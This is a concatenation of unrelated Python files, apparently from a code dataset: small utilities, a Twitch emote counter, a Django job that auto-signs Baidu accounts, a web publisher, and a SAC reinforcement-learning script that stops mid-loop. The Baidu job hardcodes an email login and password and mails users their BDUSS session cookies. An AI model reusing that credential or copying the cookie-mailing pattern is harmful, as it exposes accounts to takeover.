990,965 | c8920f368cbdebc5f2a1318d5ab6f2b1dc8edbe3 | import psutil
from plyer import notification
import time
# Poll the battery level once an hour and raise a desktop notification.
while True:
    # Re-read the sensor every cycle so the reported percentage is current;
    # the original read it once before the loop, freezing the value forever.
    battery = psutil.sensors_battery()
    percent = battery.percent
    notification.notify(
        title="Battery Percentage",
        # plyer's notify() takes the keyword 'message'; the original
        # 'messege' raised TypeError: unexpected keyword argument.
        message=str(percent) + "% Battery remaining",
        timeout=10,
    )
    time.sleep(60 * 60)
990,966 | fe8efa2c4da43d57bad02c9d739e25be4f4e49b8 | T=int(input())
# BFS shortest path per test case; prints 0 when `end` is unreachable.
from collections import deque

for t in range(T):
    V, E = map(int, input().split())
    # Dense adjacency matrix over vertices 1..V (index 0 unused).
    adj = [[0] * (V + 1) for _ in range(V + 1)]
    for _ in range(E):
        y, x = map(int, input().split())
        adj[y][x] = 1
        adj[x][y] = 1
    start, end = map(int, input().split())
    visited = [0] * (V + 1)
    distance = [-1] * (V + 1)  # -1 marks "not reached"
    queue = deque([start])     # deque: O(1) popleft vs list.pop(0)'s O(n)
    visited[start] = 1
    distance[start] = 0
    while queue:
        cur = queue.popleft()
        for nxt in range(len(adj[cur])):
            if adj[cur][nxt] == 1 and visited[nxt] == 0:
                queue.append(nxt)
                visited[nxt] = 1
                distance[nxt] = distance[cur] + 1
    if distance[end] == -1:
        # Bug fix: the original wrote `distance[end]==0`, a no-op comparison;
        # the intent was clearly to report 0 for unreachable vertices.
        distance[end] = 0
    print(f'#{t+1} {distance[end]}')
|
990,967 | 024d94925c6c19fb676bfb31d1dbb7ba2d8edd98 | import socket
import time
import json
# Set variables to connect
HOST = 'irc.twitch.tv'
PORT = 6667
NICK = 'ENTER NICK HERE'  # NOTE(review): placeholder -- fill in before running
PASS = 'ENTER PASS HERE'  # NOTE(review): placeholder OAuth token -- fill in before running
# Connect to specific channel
CHANNEL = input('What channel are you connecting to? ')
s = socket.socket()
s.connect((HOST, PORT))
# Standard IRC handshake: authenticate, set nick, join the channel.
s.send(str.encode('PASS ' + PASS + '\r\n'))
s.send(str.encode('NICK ' + NICK + '\r\n'))
s.send(str.encode('JOIN #' + CHANNEL + '\r\n'))
# Remove fluff from start of chat
while True:
    line = str(s.recv(1024))
    if 'End of /NAMES list' in line:
        break
# Initialize counter and timer
# *_counter lists hold one per-minute total each; *_count are the running
# totals for the current minute.
pog_counter = []
lul_counter = []
kappa_counter = []
sleep_counter = []
cry_counter = []
wut_counter = []
pog_count = 0
lul_count = 0
kappa_count = 0
sleep_count = 0
cry_count = 0
wut_count = 0
start = time.time()
t = 0  # number of completed minutes
minutes = int(input('How many minutes? '))
# Main loop: tally emote occurrences per chat message, bucket totals per
# minute, and dump all buckets to data.json after `minutes` minutes.
while True:
    for line in str(s.recv(1024)).split('\\r\\n'):
        if 'PING' in line:
            # Keep-alive required by the IRC server.
            s.send(bytes('PONG :tmi.twitch.tv\r\n', 'UTF-8'))
        parts = line.split(':')
        if len(parts) < 3:
            continue
        if 'QUIT' not in parts[1] and 'JOIN' not in parts[1] and 'PART' not in parts[1]:
            # NOTE(review): splitting on ':' truncates any message that
            # itself contains a colon -- parts[2] only holds the text up to
            # the next ':'. Behavior preserved from the original.
            message = parts[2]
            username = parts[1].split('!')[0]
            #print(username, ': ', message)
            if 'PogChamp' in message:
                pog_count += 1
            if 'LUL' in message:
                lul_count += 1
            if 'Kappa' in message:
                kappa_count += 1
            if 'ResidentSleeper' in message:
                sleep_count += 1
            if 'BibleThump' in message:
                cry_count += 1
            if 'WutFace' in message:
                # Bug fix: the original reset this to 0 on every WutFace,
                # so the count never accumulated; increment like the others.
                wut_count += 1
        elapsed = time.time() - start
        # Reset counters every minute
        if elapsed >= 60:
            pog_counter.append(pog_count)
            lul_counter.append(lul_count)
            kappa_counter.append(kappa_count)
            sleep_counter.append(sleep_count)
            cry_counter.append(cry_count)
            wut_counter.append(wut_count)
            pog_count = 0
            lul_count = 0
            kappa_count = 0
            sleep_count = 0
            cry_count = 0
            wut_count = 0
            print(pog_counter)
            t = t + 1
            start = time.time()
            elapsed = 0
    # After n minutes write and stop program
    if t >= minutes:
        l = [pog_counter, lul_counter, kappa_counter, sleep_counter, cry_counter, wut_counter]
        with open('data.json', 'w') as f:
            json.dump(l, f)
        break
|
990,968 | 7c68a8488f068db99dc572bfdbfea77627bc4abc | # -*- coding: utf-8 -*-
# @Time : 2019-03-22- 0022 17:34
# @Author : Andy
# @Email : 498330580@qq.com
# @File : tieba_time_task.py
# @Software: PyCharm
import os, sys
import random
import re
import time
import django
import requests as req
# Email support
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr
# Directory of the current script
# BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Set the working directory to the script directory
# os.chdir('/www/wwwroot/python/yaoling')
# print('当前脚本目录',BASE_DIR,'当前工作目录',os.getcwd())
# Add the Django project root to sys.path so this standalone script can
# import the project packages.
parent_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(parent_path)
# Point Django at the project's settings module (first arg is the env var,
# second is the settings module for this project).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "yaoling.settings")
# Initialise Django's app registry so the ORM models below are usable.
django.setup()
from tieba import models
from django.utils import timezone
def email_python(name, receivers, bduss, day):
    """Send a "your BDUSS expired" reminder email to one user.

    :param name: display name of the Tieba account
    :param receivers: recipient email address
    :param bduss: the expired BDUSS cookie value (echoed in the mail body)
    :param day: reminder day number as a string (accounts are deleted on day 8)
    """
    try:
        my_sender = 'yaolingzhijia@163.com'  # sender mailbox account
        my_user = receivers  # recipient mailbox account
        body = '''
        <h2>当前为第{day}天提醒</h2>
        <p>账号:{name}-BDUSS失效,请速至瑶玲之家签到中心修改,如超过7日未修改,该百度账号将会被删除</p>
        <p style=word-wrap:break-word>该BDUSS为:{bduss}</p>
        <p><a href="http://www.yaoling.ltd">瑶玲之家</a></p>
        '''.format(name=name, bduss=bduss, day=day)
        msg = MIMEText(body, 'html', 'utf-8')
        msg['From'] = formataddr(["瑶玲之家", my_sender])  # sender display name + address
        msg['To'] = formataddr([name, my_user])  # recipient display name + address
        msg['Subject'] = "账号{name}-BDUSS失效".format(name=name)  # mail subject
        server = smtplib.SMTP("smtp.163.com", 25)  # sender's SMTP server, port 25
        try:
            # SECURITY(review): the password is hardcoded in source -- move
            # it into the credentials/config module or an env variable.
            server.login(my_sender, "19920124Zhy")
            server.sendmail(my_sender, [my_user, ], msg.as_string())
        finally:
            # Fix: always close the SMTP connection; the original leaked it
            # whenever login() or sendmail() raised.
            server.quit()
        print("{name}邮件发送成功".format(name=name))
    except smtplib.SMTPException:
        print("Error: {name}无法发送邮件".format(name=name))
class Tieba:
    """HTTP client for one Baidu account, identified by its BDUSS cookie.

    Wraps the endpoints used for daily sign-in automation on Tieba, Wenku
    and Zhidao, plus helpers to validate the cookie and read account info.
    """
    def __init__(self, bduss):
        # One requests session per Baidu service, each carrying the BDUSS
        # login cookie in its headers/cookies.
        self.wenku = req.Session()
        self.zhidao = req.Session()
        self.tieba_qiandao = req.Session()
        self.tieba = req.Session()
        self.wenku.headers.update({
            'Accept': '*/*',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'keep-alive',
            'Cookie': 'BDUSS=' + bduss,
            'Host': 'wenku.baidu.com',
            'Referer': 'https://wenku.baidu.com/task/browse/daily',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                          'Chrome/66.0.3359.181 Safari/537.36',
            'X-Requested-With': 'XMLHttpRequest'
        })
        self.zhidao.headers.update({
            'Accept': 'application/json',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'keep-alive',
            'Content-Length': '11',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': 'BDUSS=' + bduss,
            'Host': 'zhidao.baidu.com',
            'Origin': 'https://zhidao.baidu.com',
            'Referer': 'https://zhidao.baidu.com/mmisc/signinfo?uid=C1954D0D376337B302790226BF0B702F&step=2',
            'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, '
                          'like Gecko) Version/9.0 Mobile/13B143 Safari/601.1',
            'X-ik-ssl': '1',
            'X-Requested-With': 'XMLHttpRequest',
        })
        self.tieba_qiandao.headers.update({
            'Host': 'tieba.baidu.com',
            'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, '
                          'like Gecko) Chrome/72.0.3626.109 Mobile Safari/537.36 ',
            'Cookie': 'BDUSS=' + bduss,
        })
        self.tieba.cookies.update({'BDUSS': bduss})
        self.tieba.headers.update({
            'Host': 'tieba.baidu.com',
            'User-Agent':
                'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
                'Chrome/39.0.2171.71 Safari/537.36',
        })
    def baidu_wenku(self, time_sleep=True):
        # Baidu Wenku daily sign-in; always reports success ('签到成功').
        if time_sleep:
            time.sleep(random.randint(1, 5))  # random delay between sign-ins
        url = 'https://wenku.baidu.com/task/submit/signin'
        self.wenku.get(url)
        return '签到成功'
    def baidu_zhidao(self, time_sleep=True):
        # Baidu Zhidao daily sign-in; returns the sign-in status message.
        if time_sleep:
            time.sleep(random.randint(1, 5))  # random delay between sign-ins
        url = 'https://zhidao.baidu.com/msubmit/signin?random=0.3507959078709957&'
        payload = {"ssid": "", "cifr": ""}
        if self.zhidao.post(url, data=payload).json()['errmsg'] != '已签到':
            errmsg = '签到成功'
        else:
            errmsg = '已签到'
        return errmsg
    def tieba_login_error(self):
        # True when the BDUSS cookie is still a valid Tieba login.
        if self.tieba.get('http://tieba.baidu.com/dc/common/tbs').json()['is_login']:
            return True
        else:
            return False
    def bduss_id(self):
        # Fetch the account's portrait id and build its user-centre URL;
        # falls back to the Tieba index page on any error.
        try:
            r = self.tieba_qiandao.get('http://tieba.baidu.com/f/user/json_userinfo').json()['data']['user_portrait']
            tieba_yonghu_url = 'http://tieba.baidu.com/home/main?id=' + r
            return tieba_yonghu_url
        except Exception as e:
            print('获取贴吧用户中心网页拼接ID error', e)
            return 'https://tieba.baidu.com/index.html'
    def get_name(self):
        # Scrape the Tieba username from the mobile web page; returns the
        # sentinel 'BDUSS无效' ("BDUSS invalid") when the cookie is dead.
        try:
            r = self.tieba.get('https://tieba.baidu.com/mo/q-').text
            name_re = re.search(r">([\u4e00-\u9fa5a-zA-Z0-9]+)的i贴吧<", r)
            if name_re:
                name = re.search(r">([\u4e00-\u9fa5a-zA-Z0-9]+)的i贴吧<", r).group(1)
            else:
                name = 'BDUSS无效'
        except Exception as e:
            print('网页版获取贴吧用户名error:', e)
            name = 'BDUSS无效'
        return name
    # Fetch the account's followed-forum list (id, name, sign-in state,
    # experience, level). Returns None when the request fails.
    def tieba_me_list(self):
        try:
            tieba_list = []
            html_list = self.tieba.get('http://tieba.baidu.com/mo/q/newmoindex').json()
            for i in html_list['data']['like_forum']:
                tieba_list.append({'ID': i['forum_id'],
                                   '名字': i['forum_name'],
                                   '是否签到': '是' if i['is_sign'] == 1 else '否',
                                   '经验': i['user_exp'],
                                   '等级': i['user_level'],
                                   '是否关注': '是' if i['is_like'] else '否'})
            return tieba_list
        except Exception as e:
            print('获取账号的关注贴吧列表error:', e)
    # Sign in to one forum; True on success, False when already signed or
    # on error.
    def tieba_clock(self, name, forum_id, time_sleep=True):
        try:
            if time_sleep:
                time.sleep(random.randint(1, 5))  # random delay between sign-ins
            # The tbs anti-CSRF token is scraped from the forum page.
            t = re.search('"tbs":"(.*?)"', self.tieba_qiandao.get('https://tieba.baidu.com/f?kw=%s&pn=0&' % name).text)
            if t:
                tbs = t.group(1)
                is_like = 1
                qiandao = self.tieba.get('https://tieba.baidu.com/mo/q/sign?tbs=%s&kw=%s&is_like=%d&fid=%d' % (tbs,
                                                                                                               name,
                                                                                                               is_like,
                                                                                                               int(forum_id)))
                time.sleep(2)
                if qiandao.json()['data']['msg'] != '亲,你之前已经签过了':
                    # Signed in successfully.
                    return True
                else:
                    # Forum could not be signed (already signed today).
                    return False
            # NOTE(review): if no tbs token is found the function falls
            # through and implicitly returns None -- confirm callers treat
            # None as a failure.
        except Exception as e:
            print('签到贴吧error', e)
            return False
class Task:
    """Scheduled maintenance jobs: validate BDUSS cookies, prune dead
    accounts, refresh followed-forum lists and perform daily sign-ins."""
    @staticmethod
    def bduss_error():
        # Verify every stored BDUSS; invalid cookies get the sentinel
        # username 'BDUSS无效' written back to the database.
        print('开始检查BDUSS有效性')
        bduss_list = models.Bduss.objects.all()
        for bduss in bduss_list:
            name = Tieba(bduss.bduss).get_name()
            bduss = models.Bduss.objects.filter(bduss=bduss.bduss)
            bduss.update(username=name)
        print('BDUSS有效性检查结束')
    @staticmethod
    def bduss_delete():
        # Email a daily reminder for each invalid BDUSS; delete the account
        # once 8 or more days have passed without a fix.
        print('开始删除失效的BDUSS')
        time_now = timezone.now()
        username_off = models.Bduss.objects.filter(username='BDUSS无效')
        if username_off:
            for username in username_off:
                if models.Bduss_time.objects.filter(username=username):
                    bduss_time = models.Bduss_time.objects.get(username=username)
                    # Send at most one reminder per calendar day.
                    if bduss_time.email_send.strftime("%Y-%m-%d") != time_now.strftime("%Y-%m-%d"):
                        day_int = (time_now-bduss_time.username_false).days + 1
                        if day_int >= 8:
                            username.delete()
                        else:
                            bduss_time.email_send = time_now
                            email_python(name=username.usernames,
                                         receivers=username.user.email,
                                         bduss=username.bduss,
                                         day=str(day_int))
                            bduss_time.save()
                    else:
                        print('{name}当天已发送提醒邮件'.format(name=username.usernames))
                else:
                    # First sighting of this invalid BDUSS: start the clock
                    # and send the day-1 reminder.
                    bduss_time = models.Bduss_time(username=username)
                    bduss_time.save()
                    email_python(name=username.usernames,
                                 receivers=username.user.email,
                                 bduss=username.bduss,
                                 day='1')
        # models.Bduss.objects.filter(username='BDUSS无效').delete()
        print('删除失效的BDUSS完毕')
    @staticmethod
    def tieba_me_list_update():
        # Sync each valid account's followed-forum list into the database:
        # update existing rows, create new ones, delete unfollowed forums.
        try:
            print('开始更新贴吧信息')
            bduss_list = models.Bduss.objects.exclude(username='BDUSS无效')
            tieba_me_list = []
            if bduss_list:
                for bduss in bduss_list:
                    tieba_list_get = [str(f_id['ID']) for f_id in Tieba(bduss.bduss).tieba_me_list()]
                    for tieba_me in Tieba(bduss.bduss).tieba_me_list():
                        if models.TiebaMeList.objects.filter(username=bduss, forum_id=tieba_me['ID']):
                            models.TiebaMeList.objects.filter(username=bduss, forum_id=tieba_me['ID']).update(
                                is_sign=True if tieba_me['是否签到'] == '是' else False,
                                user_exp=tieba_me['经验'],
                                user_level=tieba_me['等级']
                            )
                        else:
                            tieba_me_list.append(models.TiebaMeList(username=bduss,
                                                                    forum_name=tieba_me['名字'],
                                                                    forum_id=tieba_me['ID'],
                                                                    is_sign=True if tieba_me['是否签到'] == '是' else False,
                                                                    user_exp=tieba_me['经验'],
                                                                    user_level=tieba_me['等级']))
                    # Remove database rows for forums no longer followed.
                    for tiebalist_list in models.TiebaMeList.objects.filter(username__bduss=bduss.bduss):
                        if tiebalist_list.forum_id not in tieba_list_get:
                            models.TiebaMeList.objects.filter(forum_id=tiebalist_list.forum_id).delete()
                            print(tiebalist_list, '删除成功')
            if tieba_me_list:
                models.TiebaMeList.objects.bulk_create(tieba_me_list)
            print('更新贴吧信息结束')
        except Exception as e:
            print('定时更新个人贴吧列表数据ERROR:', e)
    @staticmethod
    def tieba_timing_task():
        # Daily forum sign-in for every tracked forum row.
        try:
            print('开始定时签到贴吧')
            for tieba_me_list in models.TiebaMeList.objects.all():
                time_now = timezone.now()
                t_year = int(time_now.strftime("%Y"))
                t_month = int(time_now.strftime("%m"))
                t_day = int(time_now.strftime("%d"))
                # Today's SignTime rows for this forum, if any.
                time_list = models.SignTime.objects.filter(name=tieba_me_list,
                                                           time__day=t_day,
                                                           time__month=t_month,
                                                           time__year=t_year
                                                           )
                if tieba_me_list.is_sign:
                    # Already signed: ensure today's SignTime record exists.
                    tieba_me_list.note = ''
                    tieba_me_list.save()
                    if not time_list:
                        s = models.SignTime(name=tieba_me_list)
                        s.save()
                else:
                    tieba = Tieba(tieba_me_list.username.bduss).tieba_clock(name=tieba_me_list.forum_name,
                                                                            forum_id=tieba_me_list.forum_id)
                    if tieba:
                        # Signed in successfully.
                        s = models.SignTime(name=tieba_me_list)
                        s.save()
                        tieba_me_list.is_sign = True
                        tieba_me_list.note = ''
                        tieba_me_list.save()
                    else:
                        # Forum could not be signed.
                        if not time_list:
                            s = models.SignTime(name=tieba_me_list)
                            s.save()
                        tieba_me_list.note = '该贴吧无法签到,请检查贴吧设置。'
                        tieba_me_list.save()
            print('定时签到贴吧结束')
        except Exception as e:
            print('定时签到error:', e)
    @staticmethod
    def baidu_wenku_sign():
        # Daily Wenku sign-in for accounts that opted in via SignConfig.
        try:
            print('开始定时签到文库')
            bduss_list = models.Bduss.objects.exclude(username='BDUSS无效').filter(user__signconfig__baidu_wenku=True)
            for bduss in bduss_list:
                Tieba(bduss.bduss).baidu_wenku()
            print('定时签到文库结束')
        except Exception as e:
            print('定时签到文库ERROR', e)
    @staticmethod
    def baidu_zhidao_sign():
        # Daily Zhidao sign-in for accounts that opted in via SignConfig.
        try:
            print('开始定时签到知道')
            bduss_list = models.Bduss.objects.exclude(username='BDUSS无效').filter(user__signconfig__baidu_zhidao=True)
            for bduss in bduss_list:
                Tieba(bduss.bduss).baidu_zhidao()
            print('定时签到知道结束')
        except Exception as e:
            print('定时签到知道ERROR', e)
def run():
    """Execute the full maintenance pipeline once, in dependency order."""
    pipeline = (
        Task.bduss_error,
        Task.bduss_delete,
        Task.tieba_me_list_update,
        Task.tieba_timing_task,
        Task.baidu_wenku_sign,
        Task.baidu_zhidao_sign,
    )
    for job in pipeline:
        job()
if __name__ == '__main__':
    # Individual tasks can be run in isolation by uncommenting them.
    # Task.bduss_error()
    # Task.bduss_delete()
    # Task.tieba_me_list_update()
    # Task.tieba_timing_task()
    # Task.baidu_wenku_sign()
    # Task.baidu_zhidao_sign()
    run()
|
990,969 | 60d0d7d69631811f2cd8de78ec57476b0f611b69 | # -*- coding: utf-8 -*-
import crom
import dawnlight
from urllib.parse import unquote
from cromlech.browser import IRequest, IResponse
from cromlech.browser import IPublisher, IView, IResponseFactory
from zope.location import ILocation, LocationProxy, locate
from .lookup import ModelLookup, ViewLookup
from .utils import safeguard
# Path-segment prefixes mapped to dawnlight namespaces ('@@name' -> view).
shortcuts = {
    '@@': dawnlight.VIEW,
}

# Default lookup instances shared by publishers that don't supply their own.
base_model_lookup = ModelLookup()
base_view_lookup = ViewLookup()


class PublicationError(Exception):
    """Raised when a located model cannot be rendered into a response."""
    pass
@crom.implements(IPublisher)
class DawnlightPublisher(object):
    """A publisher using model and view lookup components.

    Traverses the request path to a model via ``model_lookup``, then
    resolves the model (or a view on it) into an ``IResponse``.
    """

    def __init__(self,
                 model_lookup=base_model_lookup,
                 view_lookup=base_view_lookup):
        self.model_lookup = model_lookup
        self.view_lookup = view_lookup

    def base_path(self, request):
        # Strip the WSGI script_name prefix from the URL-unquoted path so
        # traversal starts relative to the application root.
        path = unquote(request.path)
        script_name = request.script_name
        if path.startswith(script_name):
            return path[len(script_name):]
        return path

    @safeguard
    def publish(self, request, root, handle_errors):
        """Resolve *request* against *root* and return an IResponse.

        Raises PublicationError when the located model has no renderer.
        """
        path = self.base_path(request)
        stack = dawnlight.parse_path(path, shortcuts)
        model, crumbs = self.model_lookup(request, root, stack)
        if IResponse.providedBy(model):
            # The found object can be returned safely.
            return model
        if IResponseFactory.providedBy(model):
            return model()
        # The model needs a renderer
        component = self.view_lookup(request, model, crumbs)
        if component is None:
            raise PublicationError('%r can not be rendered.' % model)
        # This renderer needs to be resolved into an IResponse
        if not IResponse.providedBy(component):
            factory = IResponseFactory(component)
            return factory()
        return component
@crom.adapter
@crom.sources(IRequest, Exception)
@crom.target(IResponseFactory)
def exception_view(request, exception):
    """Adapt a (request, exception) pair to an IResponseFactory.

    Looks up an IView registered for the exception; returns None when no
    such view exists, letting the error propagate.
    """
    view = IView(exception, request)
    if view is not None:
        # Make sure it's properly located.
        if not ILocation.providedBy(view):
            view = LocationProxy(view)
            locate(view, parent=exception, name='exception')
        return IResponseFactory(view)
    return None
|
990,970 | 218d17f27a4854f037858985c013634188fa9c52 | class Solution:
def countDiff(self, nums, k):
table = {}
copy = set()
res = 0
for num in nums:
if num not in copy or k == 0:
if num in table:
res += table[num]
table[num] = -1
if k != 0:
table[num - k] = table.get(num - k, 0) + 1
table[num + k] = table.get(num + k, 0) + 1
else:
table[num] = table.get(num, 0) + 1
copy.add(num)
return res
if __name__ == '__main__':
    # Read T test cases from stdin; each case is a blank line, the array,
    # and the target difference k.
    x = Solution()
    n = int(input())
    while n > 0:
        n -= 1
        input()  # discard separator/size line
        nums = [int(i) for i in input().split()]
        k = int(input())
        print(x.countDiff(nums, k))
|
990,971 | 19623492726052910386c5b35116f27cb7412869 | ''' --- Commented Out ---
#Visualize boundaries of 3D Grid
def makeMaterial(name, diffuse, specular, alpha):
mat = bpy.data.materials.new(name)
mat.diffuse_color = diffuse
mat.diffuse_shader = 'LAMBERT'
mat.diffuse_intensity = 1.0
return mat
def setMaterial(ob, mat):
me = ob.data
me.materials.append(mat)
#Visualizing axis aligned bounding box
size = 0.05
for i in range(8):
x = None;
y = None;
z = None;
if i >3:
z = zMax
else:
z = zMin
if i % 2 == 0:
y = yMin
else:
y = yMax
red = makeMaterial('Red',(1,0,0),(1,1,1),1)
origin = (xMax,y,z)
bpy.ops.mesh.primitive_uv_sphere_add(location=origin)
bpy.ops.transform.resize(value=(size, size, size))
setMaterial(bpy.context.object, red)
origin = (xMin,y,z)
bpy.ops.mesh.primitive_uv_sphere_add(location=origin)
bpy.ops.transform.resize(value=(size, size, size))
setMaterial(bpy.context.object, red)
''' |
990,972 | 0cb2287f5198344ff441a48cd9a2ecfaacd370a8 | import collections
import copy
import gym
import itertools
import numpy as np
import spinup.algos.pytorch.sac.core as core
import time
import torch
import torch.nn as nn
from spinup.utils.logx import EpochLogger
class ReplayBuffer:
    """
    A simple FIFO experience replay buffer for DDPG agents.
    """

    def __init__(self, obs_dim, act_dim, size):
        obs_shape = core.combined_shape(size, obs_dim)
        act_shape = core.combined_shape(size, act_dim)
        self.obs_buf = np.zeros(obs_shape, dtype=np.float32)
        self.obs2_buf = np.zeros(obs_shape, dtype=np.float32)
        self.act_buf = np.zeros(act_shape, dtype=np.float32)
        self.rew_buf = np.zeros(size, dtype=np.float32)
        self.done_buf = np.zeros(size, dtype=np.float32)
        self.ptr, self.size, self.max_size = 0, 0, size

    def store(self, obs, act, rew, next_obs, done):
        """Insert one transition, overwriting the oldest slot when full."""
        slot = self.ptr
        self.obs_buf[slot] = obs
        self.obs2_buf[slot] = next_obs
        self.act_buf[slot] = act
        self.rew_buf[slot] = rew
        self.done_buf[slot] = done
        self.ptr = (slot + 1) % self.max_size
        self.size = min(self.size + 1, self.max_size)

    def sample_batch(self, batch_size=32):
        """Sample a random batch; yields torch tensors in the order
        (obs, act, rew, obs2, done) as a generator (matches original API)."""
        idxs = np.random.randint(0, self.size, size=batch_size)
        buffers = (self.obs_buf, self.act_buf, self.rew_buf,
                   self.obs2_buf, self.done_buf)
        return (torch.as_tensor(buf[idxs]) for buf in buffers)
def mlp(sizes, activation=nn.ReLU, output_activation=nn.Identity):
    """Build a fully-connected network as ``nn.Sequential``.

    Each consecutive pair in *sizes* becomes a Linear layer followed by
    *activation*; the final layer uses *output_activation* instead.
    """
    modules = []
    last = len(sizes) - 2
    for idx, (n_in, n_out) in enumerate(zip(sizes[:-1], sizes[1:])):
        act_cls = output_activation if idx == last else activation
        modules.append(nn.Linear(n_in, n_out))
        modules.append(act_cls())
    return nn.Sequential(*modules)
class SquashedGaussianMLPActor(nn.Module):
    """Gaussian policy whose samples are squashed through tanh and scaled
    by the environment's action limit (SAC actor)."""

    def __init__(self, obs_dim, act_dim, hidden_sizes, act_limit, activation=nn.ReLU):
        super().__init__()
        # Shared trunk; mean and log-std are separate linear heads on top.
        self.net = mlp([obs_dim] + list(hidden_sizes), activation, activation)
        self.mu_layer = nn.Linear(hidden_sizes[-1], act_dim)
        self.log_std_layer = nn.Linear(hidden_sizes[-1], act_dim)
        self.act_limit = act_limit

    def forward(self, obs, deterministic=False, with_logprob=True):
        """Return (action, log-prob); log-prob is None when with_logprob=False."""
        net_out = self.net(obs)
        mu = self.mu_layer(net_out)
        log_std = self.log_std_layer(net_out)
        # Clamp log-std into the range defined by spinup's core module.
        log_std = torch.clamp(log_std, core.LOG_STD_MIN, core.LOG_STD_MAX)
        std = torch.exp(log_std)
        # Pre-squash distribution and sample
        pi_distribution = torch.distributions.Normal(mu, std)
        if deterministic:
            # Only used for evaluating policy at test time.
            pi_action = mu
        else:
            # rsample() keeps the sample differentiable (reparameterization).
            pi_action = pi_distribution.rsample()
        if with_logprob:
            # Gaussian log-prob summed over action dimensions, then the
            # numerically-stable form of the tanh change-of-variables
            # correction (equivalent to log(1 - tanh(x)^2) per dimension).
            logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)  # TODO: Why sum(axis=-1)
            logp_pi -= (2*(np.log(2) - pi_action - torch.nn.functional.softplus(-2*pi_action))).sum(axis=1)
        else:
            logp_pi = None
        # Squash into (-1, 1) and scale to the action bounds.
        pi_action = torch.tanh(pi_action)
        pi_action = self.act_limit * pi_action
        return pi_action, logp_pi
class QNet(nn.Module):
    """State-action value network: Q(s, a) -> one scalar per batch element."""

    def __init__(self, obs_dim, act_dim, hidden_sizes, activation=nn.ReLU):
        super().__init__()
        # Observation and action are concatenated into one input vector.
        self.q_net = mlp(sizes=[obs_dim + act_dim] + hidden_sizes + [1], activation=activation)

    def forward(self, obs, act):
        joint = torch.cat([obs, act], dim=-1)
        # Drop the trailing singleton so callers receive shape (batch,).
        return self.q_net(joint).squeeze(-1)
def my_sac(env_fn, seed=0, steps_per_epoch=4000, epochs=100, max_ep_len=1000,
           hidden_sizes=[256,256],
           logger_kwargs=dict(), save_freq=1,
           batch_size=100, start_steps=10000,
           update_after=1000, update_every=50, num_test_episodes=10,
           gamma=0.99, polyak=0.995,
           pi_lr=1e-3, q_lr=1e-3, buffer_size=int(1e6),
           alpha=0.2):
    """
    My SAC implementation

    Soft Actor-Critic with clipped double-Q learning and a fixed entropy
    coefficient ``alpha``. Interacts with ``env_fn()`` for
    ``epochs * steps_per_epoch`` steps, acting randomly for the first
    ``start_steps`` steps, then updating both Q-networks and the policy
    every ``update_every`` environment steps (after ``update_after``
    warm-up transitions) and evaluating deterministically each epoch.

    NOTE(review): ``hidden_sizes`` and ``logger_kwargs`` are mutable
    default arguments. They are not mutated below, but None-defaults
    would be the safer idiom.
    """
    # Set up logger and save configuration
    logger = EpochLogger(**logger_kwargs)
    logger.save_config(locals())
    # Random seed
    torch.manual_seed(seed)
    np.random.seed(seed)
    # Instantiate environment
    env = env_fn()
    test_env = env_fn()
    obs_dim = env.observation_space.shape[0]
    act_dim = env.action_space.shape[0]
    print("env.observation_space", env.observation_space)
    print("env.observation_space.shape", env.observation_space.shape)
    print("env.action_space", env.action_space)
    action_min = env.action_space.low[0]
    action_max = env.action_space.high[0]
    if isinstance(env.action_space, gym.spaces.Discrete):
        print("Discrete action space not supported for my_sac!")
        return
    # Set up experience buffer
    buf = ReplayBuffer(obs_dim, act_dim, buffer_size)
    # Instantiate models
    # The tanh-squashed policy assumes a symmetric action range.
    assert action_max == abs(action_min)
    policy = SquashedGaussianMLPActor(obs_dim, act_dim, hidden_sizes, action_max)
    policy_optimizer = torch.optim.Adam(policy.parameters(), lr=pi_lr)
    # Two Q-functions for Double Q Learning
    q_function_1 = QNet(obs_dim, act_dim, hidden_sizes)
    q_function_target_1 = copy.deepcopy(q_function_1)
    q_function_2 = QNet(obs_dim, act_dim, hidden_sizes)
    q_function_target_2 = copy.deepcopy(q_function_2)
    # Single optimizer over both Q-networks' parameters.
    q_params = itertools.chain(q_function_1.q_net.parameters(), q_function_2.q_net.parameters())
    q_optimizer = torch.optim.Adam(q_params, lr=q_lr)
    # Set up model saving
    logger.setup_pytorch_saver(policy)
    # TODO: Save value network as well
    # Freeze target networks with respect to optimizers (only update via polyak averaging)
    for q_targ in q_function_target_1.parameters():
        q_targ.requires_grad = False
    for q_targ in q_function_target_2.parameters():
        q_targ.requires_grad = False
    # Prepare for interaction with environment
    num_steps = epochs * steps_per_epoch
    start_time = time.time()
    o, ep_ret, ep_len = env.reset(), 0, 0
    # Main loop: collect experience in env and update/log each epoch
    for step in range(num_steps):
        with torch.no_grad():
            # Until start_steps have elapsed, randomly sample actions
            # from a uniform distribution for better exploration. Afterwards,
            # use the learned policy.
            if step < start_steps:
                a = env.action_space.sample()
            else:
                assert o.shape == (obs_dim,)
                a, _ = policy(torch.tensor(o, dtype=torch.float32).unsqueeze(0), with_logprob=False)
                assert a.shape == (1, act_dim)
                a = a[0]  # Remove batch dimension
                a = a.numpy()  # Convert to numpy
        next_o, r, d, _ = env.step(a)
        ep_ret += r
        ep_len += 1
        # Ignore the "done" signal if it comes from hitting the time
        # horizon (that is, when it's an artificial terminal signal
        # that isn't based on the agent's state)
        d = False if ep_len==max_ep_len else d
        buf.store(o, a, r, next_o, d)
        # Update obs (critical!)
        o = next_o
        # Trajectory finished
        if d or (ep_len == max_ep_len):
